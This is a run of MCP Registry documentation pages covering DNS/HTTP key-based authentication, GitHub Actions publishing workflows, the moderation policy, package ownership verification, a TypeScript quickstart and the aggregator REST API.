MY_DOMAIN="example.com"
PRIVATE_KEY="$(openssl pkey -in key.pem -noout -text | grep -A3 "priv:" | tail -n +2 | tr -d ' :\n')"
mcp-publisher login dns --domain "${MY_DOMAIN}" --private-key "${PRIVATE_KEY}"
```
```bash ECDSA P-384 theme={null}
MY_DOMAIN="example.com"
PRIVATE_KEY="$(openssl ec -in key.pem -noout -text | grep -A4 "priv:" | tail -n +2 | tr -d ' :\n')"
mcp-publisher login dns --domain "${MY_DOMAIN}" --private-key "${PRIVATE_KEY}"
```
```bash Google KMS theme={null}
MY_DOMAIN="example.com"
MY_PROJECT="myproject"
MY_KEYRING="mykeyring"
MY_KEY_NAME="mykey"
mcp-publisher login dns google-kms --domain="${MY_DOMAIN}" --resource="projects/${MY_PROJECT}/locations/global/keyRings/${MY_KEYRING}/cryptoKeys/${MY_KEY_NAME}/cryptoKeyVersions/1"
```
```bash Azure Key Vault theme={null}
MY_DOMAIN="example.com"
MY_KEY_VAULT="MyKeyVault"
MY_KEY_NAME="MyKey"
mcp-publisher login dns azure-key-vault --domain="${MY_DOMAIN}" --vault "${MY_KEY_VAULT}" --key "${MY_KEY_NAME}"
```
## HTTP Authentication
HTTP authentication is a domain-based authentication method that relies on a `/.well-known/mcp-registry-auth` file hosted on your domain. For example, `https://example.com/.well-known/mcp-registry-auth`.
To perform HTTP authentication using the `mcp-publisher` CLI tool, run the following commands in your server project directory to generate an `mcp-registry-auth` file based on a public/private key pair:
```bash Ed25519 theme={null}
# Generate public/private key pair using Ed25519
openssl genpkey -algorithm Ed25519 -out key.pem
# Generate mcp-registry-auth file
PUBLIC_KEY="$(openssl pkey -in key.pem -pubout -outform DER | tail -c 32 | base64)"
echo "v=MCPv1; k=ed25519; p=${PUBLIC_KEY}" > mcp-registry-auth
```
```bash ECDSA P-384 theme={null}
# Generate public/private key pair using ECDSA P-384
openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:secp384r1 -out key.pem
# Generate mcp-registry-auth file
PUBLIC_KEY="$(openssl ec -in key.pem -text -noout -conv_form compressed | grep -A4 "pub:" | tail -n +2 | tr -d ' :\n' | xxd -r -p | base64)"
echo "v=MCPv1; k=ecdsap384; p=${PUBLIC_KEY}" > mcp-registry-auth
```
```bash Google KMS theme={null}
MY_DOMAIN="example.com"
MY_PROJECT="myproject"
MY_KEYRING="mykeyring"
MY_KEY_NAME="mykey"
# Log in using gcloud CLI (https://cloud.google.com/sdk/docs/install)
gcloud auth login
# Set default project
gcloud config set project "${MY_PROJECT}"
# Create a keyring in your project
gcloud kms keyrings create "${MY_KEYRING}" --location global
# Create an Ed25519 signing key
gcloud kms keys create "${MY_KEY_NAME}" --default-algorithm=ec-sign-ed25519 --purpose=asymmetric-signing --keyring="${MY_KEYRING}" --location=global
# Enable Application Default Credentials (ADC) so the publisher tool can sign
gcloud auth application-default login
# Attempt login to show the public key
mcp-publisher login http google-kms --domain="${MY_DOMAIN}" --resource="projects/${MY_PROJECT}/locations/global/keyRings/${MY_KEYRING}/cryptoKeys/${MY_KEY_NAME}/cryptoKeyVersions/1"
# Copy the "Expected proof record" to `./mcp-registry-auth`:
# v=MCPv1; k=ed25519; p=${PUBLIC_KEY}
```
```bash Azure Key Vault theme={null}
MY_DOMAIN="example.com"
MY_SUBSCRIPTION="subscription name or ID"
MY_RESOURCE_GROUP="MyResourceGroup"
MY_KEY_VAULT="MyKeyVault"
MY_KEY_NAME="MyKey"
# Log in using Azure CLI (https://learn.microsoft.com/en-us/cli/azure/install-azure-cli)
az login
# Set default subscription
az account set --subscription "${MY_SUBSCRIPTION}"
# Create a resource group
az group create --location westus --resource-group "${MY_RESOURCE_GROUP}"
# Create a key vault
az keyvault create --name "${MY_KEY_VAULT}" --location westus --resource-group "${MY_RESOURCE_GROUP}"
# Create an ECDSA P-384 signing key
az keyvault key create --name "${MY_KEY_NAME}" --vault-name "${MY_KEY_VAULT}" --curve P-384
# Attempt login to show the public key
mcp-publisher login http azure-key-vault --domain="${MY_DOMAIN}" --vault "${MY_KEY_VAULT}" --key "${MY_KEY_NAME}"
# Copy the "Expected proof record" to `./mcp-registry-auth`:
# v=MCPv1; k=ecdsap384; p=${PUBLIC_KEY}
```
Then host the `mcp-registry-auth` file at `/.well-known/mcp-registry-auth` on your domain. After the file is hosted, log in using the `mcp-publisher login` command:
```bash Ed25519 theme={null}
MY_DOMAIN="example.com"
PRIVATE_KEY="$(openssl pkey -in key.pem -noout -text | grep -A3 "priv:" | tail -n +2 | tr -d ' :\n')"
mcp-publisher login http --domain "${MY_DOMAIN}" --private-key "${PRIVATE_KEY}"
```
```bash ECDSA P-384 theme={null}
MY_DOMAIN="example.com"
PRIVATE_KEY="$(openssl ec -in key.pem -noout -text | grep -A4 "priv:" | tail -n +2 | tr -d ' :\n')"
mcp-publisher login http --domain "${MY_DOMAIN}" --private-key "${PRIVATE_KEY}"
```
```bash Google KMS theme={null}
MY_DOMAIN="example.com"
MY_PROJECT="myproject"
MY_KEYRING="mykeyring"
MY_KEY_NAME="mykey"
mcp-publisher login http google-kms --domain="${MY_DOMAIN}" --resource="projects/${MY_PROJECT}/locations/global/keyRings/${MY_KEYRING}/cryptoKeys/${MY_KEY_NAME}/cryptoKeyVersions/1"
```
```bash Azure Key Vault theme={null}
MY_DOMAIN="example.com"
MY_KEY_VAULT="MyKeyVault"
MY_KEY_NAME="MyKey"
mcp-publisher login http azure-key-vault --domain="${MY_DOMAIN}" --vault "${MY_KEY_VAULT}" --key "${MY_KEY_NAME}"
```
# Frequently Asked Questions
Source: https://modelcontextprotocol.io/registry/faq
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
## General
### What is the difference between "Official MCP Registry", "MCP Registry", "MCP registry", "MCP Registry API", etc?
* "MCP Registry API" — An API that implements the [OpenAPI spec](https://github.com/modelcontextprotocol/registry/blob/main/docs/reference/api/openapi.yaml) defined by the MCP Registry.
* "Official MCP Registry API" — The REST API served at `https://registry.modelcontextprotocol.io`, which is a superset of the MCP Registry API. Its OpenAPI spec can be downloaded from [https://registry.modelcontextprotocol.io/openapi.yaml](https://registry.modelcontextprotocol.io/openapi.yaml).
* "MCP registry" — A third-party service that provides an MCP Registry API.
* "Official MCP Registry" (or "The MCP Registry") — The service that lives at `https://registry.modelcontextprotocol.io`.
### Can I delete/unpublish my server?
Currently, no. At the time of writing, there is [open discussion](https://github.com/modelcontextprotocol/registry/issues/104).
### How do I update my server metadata?
Submit a new `server.json` with a unique version string. Once published, version metadata is immutable (similar to npm).
### Can I add custom metadata when publishing?
Yes, custom metadata under `_meta.io.modelcontextprotocol.registry/publisher-provided` is preserved when publishing to the registry. This allows you to include custom metadata specific to your publishing process.
There is a 4KB size limit (4096 bytes of JSON). Publishing will fail if this limit is exceeded.
## Reporting Issues
### What if I need to report a spam or malicious server?
1. Report it as abuse to the underlying package registry (e.g. NPM, PyPi, DockerHub, etc.); and
2. Raise a GitHub issue on the registry repo with a title beginning `Abuse report: `
### What if I need to report a security vulnerability in the registry itself?
Follow [the MCP community SECURITY.md](https://github.com/modelcontextprotocol/.github/blob/main/SECURITY.md).
# How to Automate Publishing with GitHub Actions
Source: https://modelcontextprotocol.io/registry/github-actions
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
## Step 1: Create a Workflow File
In your server project directory, create a `.github/workflows/publish-mcp.yml` file. Here is an example for npm-based local server, but the MCP Registry publishing steps are the same for all package types:
```yaml OIDC authentication (recommended) theme={null}
name: Publish to MCP Registry
on:
push:
tags: ["v*"] # Triggers on version tags like v1.0.0
jobs:
publish:
runs-on: ubuntu-latest
permissions:
id-token: write # Required for OIDC authentication
contents: read
steps:
- name: Checkout code
uses: actions/checkout@v5
### Publish underlying npm package:
- name: Set up Node.js
uses: actions/setup-node@v5
with:
node-version: "lts/*"
- name: Install dependencies
run: npm ci
- name: Run tests
run: npm run test --if-present
- name: Build package
run: npm run build --if-present
- name: Publish package to npm
run: npm publish
env:
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
### Publish MCP server:
- name: Install mcp-publisher
run: |
curl -L "https://github.com/modelcontextprotocol/registry/releases/latest/download/mcp-publisher_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m | sed 's/x86_64/amd64/;s/aarch64/arm64/').tar.gz" | tar xz mcp-publisher
- name: Authenticate to MCP Registry
run: ./mcp-publisher login github-oidc
# Optional:
# - name: Set version in server.json
# run: |
# VERSION=${GITHUB_REF#refs/tags/v}
# jq --arg v "$VERSION" '.version = $v' server.json > server.tmp && mv server.tmp server.json
- name: Publish server to MCP Registry
run: ./mcp-publisher publish
```
```yaml PAT authentication theme={null}
name: Publish to MCP Registry
on:
push:
tags: ["v*"] # Triggers on version tags like v1.0.0
jobs:
publish:
runs-on: ubuntu-latest
permissions:
contents: read
steps:
- name: Checkout code
uses: actions/checkout@v5
### Publish underlying npm package:
- name: Set up Node.js
uses: actions/setup-node@v5
with:
node-version: "lts/*"
- name: Install dependencies
run: npm ci
- name: Run tests
run: npm run test --if-present
- name: Build package
run: npm run build --if-present
- name: Publish package to npm
run: npm publish
env:
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
### Publish MCP server:
- name: Install mcp-publisher
run: |
curl -L "https://github.com/modelcontextprotocol/registry/releases/latest/download/mcp-publisher_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m | sed 's/x86_64/amd64/;s/aarch64/arm64/').tar.gz" | tar xz mcp-publisher
- name: Authenticate to MCP Registry
run: ./mcp-publisher login github --token ${{ secrets.MCP_GITHUB_TOKEN }}
# Optional:
# - name: Set version in server.json
# run: |
# VERSION=${GITHUB_REF#refs/tags/v}
# jq --arg v "$VERSION" '.version = $v' server.json > server.tmp && mv server.tmp server.json
- name: Publish server to MCP Registry
run: ./mcp-publisher publish
```
```yaml DNS authentication theme={null}
name: Publish to MCP Registry
on:
push:
tags: ["v*"] # Triggers on version tags like v1.0.0
jobs:
publish:
runs-on: ubuntu-latest
permissions:
contents: read
steps:
- name: Checkout code
uses: actions/checkout@v5
### Publish underlying npm package:
- name: Set up Node.js
uses: actions/setup-node@v5
with:
node-version: "lts/*"
- name: Install dependencies
run: npm ci
- name: Run tests
run: npm run test --if-present
- name: Build package
run: npm run build --if-present
- name: Publish package to npm
run: npm publish
env:
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
### Publish MCP server:
- name: Install mcp-publisher
run: |
curl -L "https://github.com/modelcontextprotocol/registry/releases/latest/download/mcp-publisher_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m | sed 's/x86_64/amd64/;s/aarch64/arm64/').tar.gz" | tar xz mcp-publisher
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# TODO: Replace `example.com` with your domain name
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- name: Authenticate to MCP Registry
run: ./mcp-publisher login dns --domain example.com --private-key ${{ secrets.MCP_PRIVATE_KEY }}
# Optional:
# - name: Set version in server.json
# run: |
# VERSION=${GITHUB_REF#refs/tags/v}
# jq --arg v "$VERSION" '.version = $v' server.json > server.tmp && mv server.tmp server.json
- name: Publish server to MCP Registry
run: ./mcp-publisher publish
```
## Step 2: Add Secrets
You may need to add a secret to the repository depending on which authentication method you choose:
* **GitHub OIDC Authentication**: No dedicated secret necessary.
* **GitHub PAT Authentication**: Add a `MCP_GITHUB_TOKEN` secret with a GitHub Personal Access Token (PAT) that has `read:org` and `read:user` scopes.
* **DNS Authentication**: Add a `MCP_PRIVATE_KEY` secret with your Ed25519 private key.
You may also need to add secrets for your package registry. For example, the workflow above needs an `NPM_TOKEN` secret with your npm token.
For information about how to add secrets to a repository, see [Using secrets in GitHub Actions](https://docs.github.com/en/actions/how-tos/write-workflows/choose-what-workflows-do/use-secrets).
## Step 3: Tag and Release
Create and push a version tag to trigger the workflow:
```bash theme={null}
git tag v1.0.0
git push origin v1.0.0
```
The workflow will run tests, build the package, publish the package to npm, and publish the server to the MCP Registry.
## Troubleshooting
| Error Message | Action |
| --------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| "Authentication failed" | Ensure `id-token: write` permission is set for OIDC, or check secrets. |
| "Package validation failed" | Verify your package successfully published to the package registry (e.g., npm, PyPI), and that your package has the [necessary verification information](./package-types.mdx). |
# The MCP Registry Moderation Policy
Source: https://modelcontextprotocol.io/registry/moderation-policy
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
**TL;DR**: The MCP Registry is quite permissive! We only remove illegal content, malware, spam, and completely broken servers.
## Scope
This policy applies to the official MCP Registry at `registry.modelcontextprotocol.io`.
Subregistries may have their own moderation policies. If you have questions about content on a specific subregistry, please contact them directly.
## Disclaimer
The MCP Registry **does not** make guarantees about moderation, and consumers should assume minimal-to-no moderation.
The MCP Registry is a community supported project, and we have limited active moderation capabilities. We largely rely on upstream package registries (like NPM, PyPI, and Docker) or downstream subregistries (like the GitHub MCP Registry) to do more in-depth moderation.
This means there may be content in the MCP Registry that should be removed under this policy, but which we haven't yet removed. Consumers should treat scraped data accordingly.
## What We Remove
We will remove servers that contain:
* Illegal content, which includes obscene content, copyright violations, and hacking tools
* Malware, regardless of intentions
* Spam, especially mass-created servers that disrupt the registry. Examples:
* The same server being submitted multiple times under different names
* A server that doesn't do anything but provide a fixed response with some marketing copy
* A server with a description stuffed with marketing copy and an unrelated implementation
* Non-functioning servers
## What We Don't Remove
Generally, we believe in keeping the registry open and pushing moderation to subregistries. We therefore **won't** remove:
* Low-quality or buggy servers
* Servers with security vulnerabilities
* Servers that do the same thing as other servers
* Servers that provide or contain adult content
## How Removal Works
When we remove a server, we set the server's `status` to `"deleted"`, but the server's metadata remains accessible via the MCP Registry API. Aggregators may then remove the server from their indexes.
In extreme cases, we may overwrite or erase the server's metadata. For example, if the metadata itself is unlawful.
## Appeals
Think we made a mistake? Open an issue on our [GitHub repository](https://github.com/modelcontextprotocol/registry) with:
* The name of the server
* Why you believe the server doesn't meet the above criteria for removal
## Changes to This Policy
We're still learning how best to run the MCP Registry! As such, we might end up changing this policy in the future.
# MCP Registry Supported Package Types
Source: https://modelcontextprotocol.io/registry/package-types
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
# Package Types
The MCP Registry supports several different package types, and each package type has its own verification method.
## npm Packages
For npm packages, the MCP Registry currently supports the npm public registry (`https://registry.npmjs.org`) only.
npm packages use `"registryType": "npm"` in `server.json`. For example:
```json server.json highlight={9} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/email-integration-mcp",
"title": "Email Integration",
"description": "Send emails and manage email accounts",
"version": "1.0.0",
"packages": [
{
"registryType": "npm",
"identifier": "@username/email-integration-mcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
### Ownership Verification
The MCP Registry verifies ownership of npm packages by checking `mcpName` in `package.json`. The `mcpName` property **MUST** match the server name from `server.json`. For example:
```json package.json theme={null}
{
"name": "@username/email-integration-mcp",
"version": "1.0.0",
"mcpName": "io.github.username/email-integration-mcp"
}
```
## PyPI Packages
For PyPI packages, the MCP Registry currently supports the official PyPI registry (`https://pypi.org`) only.
PyPI packages use `"registryType": "pypi"` in `server.json`. For example:
```json server.json highlight={9} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/database-query-mcp",
"title": "Database Query",
"description": "Execute SQL queries and manage database connections",
"version": "1.0.0",
"packages": [
{
"registryType": "pypi",
"identifier": "database-query-mcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
### Ownership Verification
The MCP Registry verifies ownership of PyPI packages by checking for the existence of an `mcp-name: $SERVER_NAME` string in the package README (which becomes the package description on PyPI). The string may be hidden in a comment, but the `$SERVER_NAME` portion **MUST** match the server name from `server.json`. For example:
```markdown README.md highlight={5} theme={null}
# Database Query MCP Server
This MCP server executes SQL queries and manages database connections.
```
## NuGet Packages
For NuGet packages, the MCP Registry currently supports the official NuGet registry (`https://api.nuget.org/v3/index.json`) only.
NuGet packages use `"registryType": "nuget"` in `server.json`. For example:
```json server.json highlight={9} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/azure-devops-mcp",
"title": "Azure DevOps",
"description": "Manage Azure DevOps work items and pipelines",
"version": "1.0.0",
"packages": [
{
"registryType": "nuget",
"identifier": "Username.AzureDevOpsMcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
### Ownership Verification
The MCP Registry verifies ownership of NuGet packages by checking for the existence of an `mcp-name: $SERVER_NAME` string in the package README. The string may be hidden in a comment, but the `$SERVER_NAME` portion **MUST** match the server name from `server.json`. For example:
```markdown README.md highlight={5} theme={null}
# Azure DevOps MCP Server
This MCP server manages Azure DevOps work items and pipelines.
```
## Docker/OCI Images
For Docker/OCI images, the MCP Registry currently supports:
* Docker Hub (`docker.io`)
* GitHub Container Registry (`ghcr.io`)
* Google Artifact Registry (any `*.pkg.dev` domain)
* Azure Container Registry (`*.azurecr.io`)
* Microsoft Container Registry (`mcr.microsoft.com`)
Docker/OCI images use `"registryType": "oci"` in `server.json`. For example:
```json server.json highlight={9} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/kubernetes-manager-mcp",
"title": "Kubernetes Manager",
"description": "Deploy and manage Kubernetes resources",
"version": "1.0.0",
"packages": [
{
"registryType": "oci",
"identifier": "docker.io/yourusername/kubernetes-manager-mcp:1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
The format of `identifier` is `registry/namespace/repository:tag`. For example, `docker.io/user/app:1.0.0` or `ghcr.io/user/app:1.0.0`. The tag can also be specified as a digest.
### Ownership Verification
The MCP Registry verifies ownership of Docker/OCI images by checking for an `io.modelcontextprotocol.server.name` annotation. The value of the `io.modelcontextprotocol.server.name` annotation **MUST** match the server name from `server.json`. For example:
```dockerfile Dockerfile theme={null}
LABEL io.modelcontextprotocol.server.name="io.github.username/kubernetes-manager-mcp"
```
## MCPB Packages
For MCPB packages, the MCP Registry currently supports MCPB artifacts hosted via GitHub or GitLab releases.
MCPB packages use `"registryType": "mcpb"` in `server.json`. For example:
```json server.json highlight={9} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/image-processor-mcp",
"title": "Image Processor",
"description": "Process and transform images with various filters",
"version": "1.0.0",
"packages": [
{
"registryType": "mcpb",
"identifier": "https://github.com/username/image-processor-mcp/releases/download/v1.0.0/image-processor.mcpb",
"fileSha256": "fe333e598595000ae021bd27117db32ec69af6987f507ba7a63c90638ff633ce",
"transport": {
"type": "stdio"
}
}
]
}
```
### Verification
The MCPB package URL (`identifier` in `server.json`) **MUST** contain the string "mcp". That can be as part of the `.mcpb` file extension or in the name of the repository.
The package metadata in `server.json` **MUST** include a `fileSha256` property with a SHA-256 hash of the MCPB artifact, which can be computed using the `openssl` command:
```bash theme={null}
openssl dgst -sha256 image-processor.mcpb
```
The MCP Registry does not validate this hash; however, MCP clients **do** validate the hash before installation to ensure file integrity. Downstream registries may also implement their own validation.
# Quickstart: Publish an MCP Server to the MCP Registry
Source: https://modelcontextprotocol.io/registry/quickstart
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
This tutorial will show you how to publish an MCP server written in TypeScript to the MCP Registry using the official `mcp-publisher` CLI tool.
## Prerequisites
* **Node.js** — This tutorial assumes the MCP server is written in TypeScript.
* **npm account** — The MCP Registry only hosts metadata, not artifacts. Before publishing to the MCP Registry, we will publish the MCP server's package to npm, so you will need an [npm](https://www.npmjs.com) account.
* **GitHub account** — The MCP Registry supports [multiple authentication methods](./authentication.mdx). For simplicity, this tutorial will use GitHub-based authentication, so you will need a [GitHub](https://github.com/) account.
If you do not have an MCP server written in TypeScript, you can copy the `weather-server-typescript` server from the [`modelcontextprotocol/quickstart-resources` repository](https://github.com/modelcontextprotocol/quickstart-resources) to follow along with this tutorial:
```bash theme={null}
git clone --depth 1 git@github.com:modelcontextprotocol/quickstart-resources.git
cp -r quickstart-resources/weather-server-typescript .
rm -rf quickstart-resources
cd weather-server-typescript
```
And edit `package.json` to reflect your information:
```diff package.json theme={null}
{
- "name": "mcp-quickstart-ts",
- "version": "1.0.0",
+ "name": "@my-username/mcp-weather-server",
+ "version": "1.0.1",
"main": "index.js",
```
```diff package.json theme={null}
"license": "ISC",
- "description": "",
+ "repository": {
+ "type": "git",
+ "url": "https://github.com/my-username/mcp-weather-server.git"
+ },
+ "description": "An MCP server for weather information.",
"devDependencies": {
```
## Step 1: Add verification information to the package
The MCP Registry verifies that a server's underlying package matches its metadata. For npm packages, this requires adding an `mcpName` property to `package.json`:
```diff package.json theme={null}
{
"name": "@my-username/mcp-weather-server",
"version": "1.0.1",
+ "mcpName": "io.github.my-username/weather",
"main": "index.js",
```
The value of `mcpName` will be your server's name in the MCP Registry.
Because we will be using GitHub-based authentication, `mcpName` **must** start with `io.github.my-username/`.
## Step 2: Publish the package
The MCP Registry only hosts metadata, not artifacts, so we must publish the package to npm before publishing the server to the MCP Registry.
Ensure the distribution files are built:
```bash theme={null}
# Navigate to project directory
cd weather-server-typescript
# Install dependencies
npm install
# Build the distribution files
npm run build
```
Then follow npm's [publishing guide](https://docs.npmjs.com/creating-and-publishing-scoped-public-packages). In particular, you will probably need to run the following commands:
```bash theme={null}
# If necessary, authenticate to npm
npm adduser
# Publish the package
npm publish --access public
```
You can verify your package is published by visiting its npm URL, such as [https://www.npmjs.com/package/@my-username/mcp-weather-server](https://www.npmjs.com/package/@my-username/mcp-weather-server).
## Step 3: Install `mcp-publisher`
Install the `mcp-publisher` CLI tool using a pre-built binary or [Homebrew](https://brew.sh):
```bash macOS/Linux theme={null}
curl -L "https://github.com/modelcontextprotocol/registry/releases/latest/download/mcp-publisher_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m | sed 's/x86_64/amd64/;s/aarch64/arm64/').tar.gz" | tar xz mcp-publisher && sudo mv mcp-publisher /usr/local/bin/
```
```powershell Windows theme={null}
$arch = if ([System.Runtime.InteropServices.RuntimeInformation]::ProcessArchitecture -eq "Arm64") { "arm64" } else { "amd64" }; Invoke-WebRequest -Uri "https://github.com/modelcontextprotocol/registry/releases/latest/download/mcp-publisher_windows_$arch.tar.gz" -OutFile "mcp-publisher.tar.gz"; tar xf mcp-publisher.tar.gz mcp-publisher.exe; rm mcp-publisher.tar.gz
# Move mcp-publisher.exe to a directory in your PATH
```
```bash theme={null}
brew install mcp-publisher
```
Verify that `mcp-publisher` is correctly installed by running:
```bash theme={null}
mcp-publisher --help
```
You should see output like:
```text Output theme={null}
MCP Registry Publisher Tool
Usage:
mcp-publisher [arguments]
Commands:
init Create a server.json file template
login Authenticate with the registry
logout Clear saved authentication
publish Publish server.json to the registry
```
## Step 4: Create `server.json`
The `mcp-publisher init` command can generate a `server.json` template file with some information derived from your project.
In your server project directory, run `mcp-publisher init`:
```bash theme={null}
mcp-publisher init
```
Open the generated `server.json` file, and you should see contents like:
```json server.json theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.my-username/weather",
"description": "An MCP server for weather information.",
"repository": {
"url": "https://github.com/my-username/mcp-weather-server",
"source": "github"
},
"version": "1.0.0",
"packages": [
{
"registryType": "npm",
"identifier": "@my-username/mcp-weather-server",
"version": "1.0.0",
"transport": {
"type": "stdio"
},
"environmentVariables": [
{
"description": "Your API key for the service",
"isRequired": true,
"format": "string",
"isSecret": true,
"name": "YOUR_API_KEY"
}
]
}
]
}
```
Edit the contents as necessary:
```diff server.json theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.my-username/weather",
"description": "An MCP server for weather information.",
"repository": {
"url": "https://github.com/my-username/mcp-weather-server",
"source": "github"
},
- "version": "1.0.0",
+ "version": "1.0.1",
"packages": [
{
"registryType": "npm",
"identifier": "@my-username/mcp-weather-server",
- "version": "1.0.0",
+ "version": "1.0.1",
"transport": {
"type": "stdio"
- },
- "environmentVariables": [
- {
- "description": "Your API key for the service",
- "isRequired": true,
- "format": "string",
- "isSecret": true,
- "name": "YOUR_API_KEY"
- }
- ]
+ }
}
]
}
```
The `name` property in `server.json` **must** match the `mcpName` property in `package.json`.
## Step 5: Authenticate with the MCP Registry
For this tutorial, we will authenticate with the MCP Registry using GitHub-based authentication.
Run the `mcp-publisher login` command to initiate authentication:
```bash theme={null}
mcp-publisher login github
```
You should see output like:
```text Output theme={null}
Logging in with github...
To authenticate, please:
1. Go to: https://github.com/login/device
2. Enter code: ABCD-1234
3. Authorize this application
Waiting for authorization...
```
Visit the link, follow the prompts, and enter the authorization code that was printed in the terminal (e.g., `ABCD-1234` in the above output). Once complete, go back to the terminal, and you should see output like:
```text Output theme={null}
Successfully authenticated!
✓ Successfully logged in
```
## Step 6: Publish to the MCP Registry
Finally, publish your server to the MCP Registry using the `mcp-publisher publish` command:
```bash theme={null}
mcp-publisher publish
```
You should see output like:
```text Output theme={null}
Publishing to https://registry.modelcontextprotocol.io...
✓ Successfully published
✓ Server io.github.my-username/weather version 1.0.1
```
You can verify that your server is published by searching for it using the MCP Registry API:
```bash theme={null}
curl "https://registry.modelcontextprotocol.io/v0.1/servers?search=io.github.my-username/weather"
```
You should see your server's metadata in the search results JSON:
```text Output theme={null}
{"servers":[{ ... "name":"io.github.my-username/weather" ... }]}
```
## Troubleshooting
| Error Message | Action |
| --------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------- |
| "Registry validation failed for package" | Ensure your package includes the required validation information (e.g, `mcpName` property in `package.json`). |
| "Invalid or expired Registry JWT token" | Re-authenticate by running `mcp-publisher login github`. |
| "You do not have permission to publish this server" | Your authentication method doesn't match your server's namespace format. With GitHub auth, your server name must start with `io.github.your-username/`. |
## Next Steps
* Learn about [support for other package types](./package-types.mdx).
* Learn about [support for remote servers](./remote-servers.mdx).
* Learn how to [use other authentication methods](./authentication.mdx), such as [DNS authentication](./authentication.mdx#dns-authentication) which enables custom domains for server name prefixes.
* Learn how to [automate publishing with GitHub Actions](./github-actions.mdx).
# MCP Registry Aggregators
Source: https://modelcontextprotocol.io/registry/registry-aggregators
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
Aggregators are downstream consumers of the MCP Registry that provide additional value. For example, a server marketplace that provides user ratings and security scanning.
The MCP Registry provides an unauthenticated read-only REST API that aggregators can use to populate their data stores. Aggregators are expected to scrape data on a regular but infrequent basis (e.g., once per hour), and persist the data in their own data store. The MCP Registry **does not provide uptime or data durability guarantees**.
## Consuming the MCP Registry REST API
The base URL for the MCP Registry REST API is `https://registry.modelcontextprotocol.io`. It supports the following endpoints:
* [`GET /v0.1/servers`](https://registry.modelcontextprotocol.io/docs#/operations/list-servers-v0.1) — List all servers.
* [`GET /v0.1/servers/{serverName}/versions`](https://registry.modelcontextprotocol.io/docs#/operations/get-server-versions-v0.1) — List all versions of a server.
* [`GET /v0.1/servers/{serverName}/versions/{version}`](https://registry.modelcontextprotocol.io/docs#/operations/get-server-version-v0.1) — Get a specific version of a server. Use the special version `latest` to get the latest version of the server.
URL path parameters such as `serverName` and `version` **must** be URL-encoded. For example, `io.modelcontextprotocol/everything` must be encoded as `io.modelcontextprotocol%2Feverything`.
Aggregators will most likely scrape the `GET /v0.1/servers` endpoint.
### Pagination
The `GET /v0.1/servers` endpoint supports cursor-based pagination.
For example, the first page can be fetched using a `limit` query parameter:
```bash theme={null}
curl "https://registry.modelcontextprotocol.io/v0.1/servers?limit=100"
```
```jsonc Output highlight={5} theme={null}
{
"servers": [
/* ... */
],
"metadata": {
"count": 100,
"nextCursor": "com.example/my-server:1.0.0",
},
}
```
Then subsequent pages can be fetched by passing the `nextCursor` value as the `cursor` query parameter:
```bash theme={null}
curl "https://registry.modelcontextprotocol.io/v0.1/servers?limit=100&cursor=com.example/my-server:1.0.0"
```
### Filtering Since
The `GET /v0.1/servers` endpoint supports filtering servers that have been updated since a given timestamp.
For example, servers that have been updated since 2025-10-23 can be fetched using an `updated_since` query parameter in [RFC 3339](https://datatracker.ietf.org/doc/html/rfc3339) date-time format:
```bash theme={null}
curl "https://registry.modelcontextprotocol.io/v0.1/servers?updated_since=2025-10-23T00:00:00.000Z"
```
## Server Status
Server metadata is generally immutable, except for the `status` field which may be updated to, e.g., `"deprecated"` or `"deleted"`. We recommend that aggregators keep their copy of each server's `status` up to date.
The `"deleted"` status typically indicates that a server has violated our permissive [moderation policy](./moderation-policy.mdx), suggesting the server might be spam, malware, or illegal. Aggregators may prefer to remove these servers from their index.
## Acting as a Subregistry
A subregistry is an aggregator that also implements the [OpenAPI spec](https://github.com/modelcontextprotocol/registry/blob/main/docs/reference/api/openapi.yaml) defined by the MCP Registry. This allows clients, such as MCP host applications, to consume server metadata via a standardized interface.
